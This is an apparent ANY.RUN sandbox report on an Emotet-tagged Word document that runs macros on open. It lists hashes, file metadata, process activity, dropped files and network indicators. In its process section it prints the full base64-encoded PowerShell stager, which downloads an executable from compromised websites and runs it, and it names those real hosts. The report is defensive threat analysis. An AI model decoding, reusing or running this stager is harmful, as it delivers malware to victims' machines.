analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Inf-991174-8949428.doc

Full analysis: https://app.any.run/tasks/98c6c332-cacf-474b-9276-472177314b53
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 07:54:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Flat, Subject: customized, Author: Germaine Hackett, Comments: Isle Automotive, Shoes & Clothing, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 07:53:00 2019, Last Saved Time/Date: Tue May 14 07:53:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 166, Security: 0
MD5:

92ADC15F0AA1ECD366CF08C18438CA9E

SHA1:

26CF6E0BE4053C3BCBEDFF4B827F045E14578905

SHA256:

56BFA3B6295F734FEC4234846BFF6648AD5F6363169E6D3705C86D315ECE2F03

SSDEEP:

3072:Ei1Y77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzMaJSWI+zy0WD8Mggr:e77HUUUUUUUUUUUUUUUUUUUT52Vg1AWY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3048)
    • Creates files in the user directory

      • powershell.exe (PID: 3048)
    • PowerShell script executed

      • powershell.exe (PID: 3048)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3324)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3324)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Turner
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 194
Paragraphs: 1
Lines: 1
Company: Goodwin - Daniel
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 166
Words: 29
Pages: 1
ModifyDate: 2019:05:14 06:53:00
CreateDate: 2019:05:14 06:53:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Isle Automotive, Shoes & Clothing
Keywords: -
Author: Germaine Hackett
Subject: customized
Title: Flat
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3324"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Inf-991174-8949428.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3048powershell -enc JABVADYAOAA0ADMAOAAxADEAPQAnAEgAMgAxADAAOAA5ACcAOwAkAEMANgA1ADYAMAA2AF8AIAA9ACAAJwA5ADkANwAnADsAJABVADgAMwAxADIANgA9ACcAVABfADEAOQA1ADMANgA0ACcAOwAkAEkAMgAzADEAOAAyADIANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwA2ADUANgAwADYAXwArACcALgBlAHgAZQAnADsAJAByADEANAA4ADEAMwA2AD0AJwBCADcAOAA5ADAAMAAwACcAOwAkAHEANgAwADQANgBfADUANwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYABCAGAAYwBMAGkAZQBuAHQAOwAkAEcAMAAyADIAOQA0ADcANgA9ACcAaAB0AHQAcABzADoALwAvAHQAZQBjAG4AbwBsAG8AZwBpAGEAbwBmAGkAYwBpAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYgByADgAMwAvAEAAaAB0AHQAcAA6AC8ALwBlAHYAYQBtAG8AdABlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbAAwADcAYgBwADgANAA4ADUALwBAAGgAdAB0AHAAOgAvAC8AdABlAHIAbQBpAG4AYQBsAC0AaABlAGEAdgBlAG4ALgBjAG8AbQAvADIAMAAwADYALwB3ADUAMQB6ADgANwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAdQB6AHUAcgB1AG4AawBhAGwAYgBpAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwAwAG0AaAA0ADcANQAvAEAAaAB0AHQAcABzADoALwAvAHIAZQBnAGkAZwBvAHMAYwBvAHIAaQBuAGcALgBjAG8AbQAvADcAYgAwAG8AZQB3AGUALwAzADIAZgBmAGQAMwA5AC8AJwAuAHMAUABMAEkAVAAoACcAQAAnACkAOwAkAEoANQA3ADkANQBfAD0AJwB1ADMAOQBfADYANgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwA5ADUAXwAzADUAOQA1ACAAaQBuACAAJABHADAAMgAyADkANAA3ADYAKQB7AHQAcgB5AHsAJABxADYAMAA0ADYAXwA1ADcALgBEAE8AVwBuAEwAbwBBAEQAZgBpAEwAZQAoACQASwA5ADUAXwAzADUAOQA1ACwAIAAkAEkAMgAzADEAOAAyADIANwApADsAJABJADYAMAA4ADcAMQA9ACcAdwA5ADIAOAAzADIAXwA3ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQASQAyADMAMQA4ADIAMgA3ACkALgBMAGUAbgBHAFQASAAgAC0AZwBlACAAMwA5ADcAOQA5ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAMgAzADEAOAAyADIANwA7ACQAQgAwADEAOAA0ADEAPQAnAE4ANQA2ADYAMQA1ACcAOwBiAHIAZQBhAGsAOwAkAFIAXwA2ADgAMgAwADcAMAA9ACcAQQAwADgANAAyAF8AMwA0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAMAA2ADcANwA4ADMAPQAnAEsAMQAzADgANQA3ADcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 358
Read events
885
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREF00.tmp.cvr
MD5:
SHA256:
3048powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NOYFBFVOAGBX6LNX3HHZ.temp
MD5:
SHA256:
3048powershell.exeC:\Users\admin\997.exe
MD5:
SHA256:
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE4BB7A.wmfwmf
MD5:60D8E1E1C7F8EC9AFFBA257A1CC33C34
SHA256:62933D4B20488355538F68B4F890CB0FF4D358D93CD000C26239A65DA3156A18
3324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$f-991174-8949428.docpgc
MD5:123FA107A2314AB3C861364B440642B0
SHA256:8E834EE6968A767428C7CB09803C813CE532F8425FFFB6B8C294BCA73AFFABA7
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA290198.wmfwmf
MD5:8A62C1798A0504F5222815145B762C50
SHA256:8E8FBB941AFAA734D04B68AF8EC1602B32F02AF02C99FAFBFAF935BA8326CD1C
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\253C018C.wmfwmf
MD5:9B737FFE09463B1812DC2385F0EF4F85
SHA256:33B1EB1C987BC3432EC71706C23C0FB502BEA99AA0535E6E9078FEF81535EB39
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12FE1366.wmfwmf
MD5:5FBB90B329DB3BA8E84BA0C3067FEBFC
SHA256:81F18AF75192BB038B20AF9C09431E0FEBA225B17EBEE3EAE5261E015074EEEA
3324WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:04F68EE1DBF135426A2155F09A60F238
SHA256:8DA1FCF7803CFA3DE1A521406308EE5BA34F874A6BC6B9DB0B2A7B4A9C570776
3324WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1797A02F.wmfwmf
MD5:E45DBC7196E878BDC1D845895A1F364D
SHA256:1BEBFE51D23FB63CE96161007ABBDF7FC0C357FB08C030ACA1F8BE5A446E541D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3048
powershell.exe
GET
198.2.196.29:80
http://evamote.com/wp-content/l07bp8485/
CN
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3048
powershell.exe
104.28.7.23:443
tecnologiaoficial.com
Cloudflare Inc
US
shared
3048
powershell.exe
198.2.196.29:80
evamote.com
PEG TECH INC
CN
unknown

DNS requests

Domain
IP
Reputation
tecnologiaoficial.com
  • 104.28.7.23
  • 104.28.6.23
malicious
evamote.com
  • 198.2.196.29
unknown

Threats

No threats detected
No debug info